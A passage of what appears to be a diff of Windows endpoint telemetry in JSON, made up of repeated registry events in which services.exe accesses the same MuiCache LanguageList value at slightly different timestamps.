"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 